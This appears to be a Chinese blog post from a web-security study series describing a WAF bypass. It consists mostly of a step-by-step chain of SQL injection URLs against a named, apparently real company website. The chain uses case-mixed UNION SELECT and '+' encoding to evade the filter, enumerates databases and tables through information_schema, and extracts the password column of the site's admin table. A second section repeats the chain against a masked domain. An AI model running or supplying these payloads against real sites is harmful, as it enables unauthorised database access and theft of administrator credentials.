WAF绕过实战

合集 - web安全学习(20)

1.sqlmap的tamper详解2024-11-012.SQLMAP2024-11-013.web安全作业（SQL注入1）2024-11-02

4.WAF绕过实战2024-11-03

5.SQL注入绕过2024-11-036.SQL注入（下）2024-11-037.SQL注入（中下)2024-11-038.SQL注入（中上）2024-11-039.SQL注入（上）2024-11-0310.web安全作业（SQL注入2）2024-11-0311.xss-labs-master靶机1-20关解题思路2024-11-1112.web(xss漏洞作业)2024-11-1113.XSS漏洞（上）2024-11-1114.XSS漏洞（下）2024-11-1115.XSS实验（上）2024-11-1116.XSS实验（中）2024-11-1117.XSS实验（下）2024-11-1118.信息收集（上）2024-11-1119.信息收集（下）2024-11-1120.文件包含漏洞2024-11-29

收起

网站地址：

http://www.ghtcghtc.com

注入地址：

http://www.ghtcghtc.com/news_blank.php?id=35

1. http://www.ghtcghtc.com/news_blank.php?id=36-1 判断出数值型
2. http://www.ghtcghtc.com/news_blank.php?id=35 and 1=1 被拦截

1. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=1
2. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=2
3. order by 判断为11个字段
4. -35+union+select+1,2,3,4,5,6,7,8,9,10,11 4和8的位置

1. -35+union+select+1,2,3,(database()),5,6,7,8,9,10,11

8.35+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name%20as%20char))),5,6,7,8,9,10,11%20from%20information_schema.schemata%20limit%202,1

HEX()函数:返回十六进制值的字符串表示形式

UNHEX() 函数: 每对十六进制数字转化为一个字符

CAST函数用于将某种数据类型的表达式显式转换为另一种数据类型。CAST()函数的参数是一个表达式,它包括用AS关键字分隔的源值和目标数据类型。

9

+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,8,9,10,11 from information_schema.tables where table_schema='hengdong' limit 0,1

1. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,8,9,10,11 from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4
2. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,8,9,10,11  from hdwl_admin

其他解答：

http://xxx.com/news_blank.php?id=296 and 1=1

http://xxxxx.com/news_blank.php?id=296+and+1=1

http://xxxx.com/news_blank.php?id=296+and+1=2

http://xxxx.com/news_blank.php?id=296 order by 11  正确

http://xxxx.com/news_blank.php?id=296 order by 12 错误

http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 拦截

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11  from information_schema.tables where table_schema='hengdong' limit 0,1

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11  from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11  from hdwl_admin